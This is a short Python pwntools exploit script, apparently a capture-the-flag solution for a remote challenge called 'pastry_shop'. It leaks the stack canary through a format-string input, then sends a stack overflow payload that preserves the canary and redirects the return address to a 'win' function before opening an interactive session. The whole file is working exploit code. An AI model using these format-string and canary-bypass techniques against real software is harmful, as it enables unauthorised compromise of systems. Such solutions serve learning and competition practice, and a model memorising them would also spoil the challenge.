31 lines
676 B
Python
31 lines
676 B
Python
#!/usr/bin/env python3
|
|
from pwn import *
|
|
|
|
# elf = context.binary = ELF('./pastry_shop', checksec=False)
|
|
|
|
# %lx.%lx.%lx.%lx.%lx.%lx.%lx.%lx
|
|
CANARY_IDX = 23
|
|
OFFSET_TO_CANARY = 72
|
|
# Space between canary and RIP
|
|
OFFSET_TO_RIP = 88
|
|
|
|
# p = process(elf.path)
|
|
p = remote("offsec.m0lecon.it", 13538)
|
|
p.recvuntil(b"dear customer?\n")
|
|
p.sendline(f"%{CANARY_IDX}$lx".encode())
|
|
leak = p.recvline().strip()
|
|
canary = int(leak, 16)
|
|
log.info(f"canary = {canary:#x}")
|
|
win_addr = 0x00000000004012C2
|
|
p.recvuntil(b"to order?\n")
|
|
|
|
payload = flat(
|
|
b"A" * OFFSET_TO_CANARY,
|
|
p64(canary),
|
|
b"B" * (OFFSET_TO_RIP - OFFSET_TO_CANARY - 8),
|
|
p64(win_addr),
|
|
)
|
|
|
|
p.send(payload)
|
|
p.interactive()
|